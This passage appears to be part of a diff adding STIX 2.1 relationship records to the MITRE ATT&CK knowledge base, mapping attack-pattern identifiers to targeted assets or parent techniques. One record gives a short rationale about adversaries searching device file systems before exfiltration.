"attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40f0ad51-c9dc-4c82-afa5-cd4fee79dc01", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--413c1c41-6ef9-413b-a75a-e67f1668b3db", + "created": "2023-09-29T17:04:46.290Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:04:46.290Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4142c046-18da-4a55-8aad-84370121332d", + "created": "2020-10-01T00:55:17.851Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--414fb228-6842-4e57-8c86-b7796ec61c4a", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--417f723e-62b1-47b6-ac47-309fa342a077", + "created": "2024-06-27T09:32:43.174Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:32:43.174Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4180422b-a478-4ceb-ac8c-6fe86c85399c", + "created": "2020-03-13T21:13:10.630Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41a109dd-11d9-4840-a38b-088fc790f45a", + "created": "2024-03-25T20:17:27.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:17:27.552Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41bbbd41-49bf-460e-9580-4b5990018fd8", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41c8ee0a-b4fb-4773-908b-bcb87e2edfab", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41c9b19f-2b58-4e33-aba8-811d50fdb267", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41dbf626-b968-4b51-9f7d-aaea14d39b4d", + "created": "2023-09-28T19:58:43.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:58:43.542Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41f55950-1027-4b97-906c-2a21e9fdb915", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--41f59caf-ccb6-4880-b4b5-ff868b1b674c", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42019a76-a043-4324-850f-c69e3573749d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42200808-a5a5-4475-b268-6343291ca3a9", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--422bd26f-aadc-4755-9ee5-1cd93a108a4c", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42319a97-f764-4fcc-9120-c91409056a1c", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4243beb2-2172-4420-bda5-2936359a5dd1", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4254a25c-8b0e-476e-ac31-746d76746927", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4267276a-b1bf-4a34-bacb-211480b012f3", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4297c8e2-e0a8-49bc-94a9-ec2b682adaa3", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42abfb74-9486-430f-bc74-ec5d471cb56b", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42c0040f-b5a0-433a-99df-92c17a336b33", + "created": "2024-05-23T03:49:27.731Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-30T16:03:35.098Z", + "description": "Asset Mapping Rationale: \nAdversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a Network Device CLI, which have functionality to interact with the file system to gather information.", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42c651c4-e250-49ef-8748-35bbe68e7832", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42e2f8c1-f1de-437e-a52d-81e53208baa1", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42e4695d-2bf6-4a8c-87a3-1d0e9424091c", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42e53ab7-db1a-4a8e-b938-841ce384f790", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42fd0067-d6ef-44cf-89d7-958f9e81287e", + "created": "2024-06-26T15:36:42.972Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:36:42.972Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--42ffe8ec-11b1-41aa-83d9-64b8c9568613", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--431b3f61-4eca-4b14-820f-106f9fb274d9", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--432b2dc0-52ff-488f-a5e9-c1e510fc7a0b", + "created": "2023-09-28T19:58:54.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:58:54.450Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43344cd7-5004-4dac-8b62-8899105fa265", + "created": "2023-09-29T18:47:20.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:47:20.334Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4334b2c5-f232-45fd-a761-c7694dd0cd16", + "created": "2024-06-26T13:51:02.907Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:51:02.907Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43442927-50bd-45b1-bfc1-47c8df91b83f", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4347eb2b-b33d-4e17-94f2-3701e18f0cab", + "created": "2021-05-20T12:20:42.354Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43609dee-28cc-416b-9dd7-53e4fe54f7cb", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--43785ca5-e74a-4814-9a2c-0ce3f0c4c0ac", + "created": "2024-06-26T19:21:42.695Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:21:42.695Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4392bf8b-c84d-47aa-91a9-9b9de90ce93f", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + 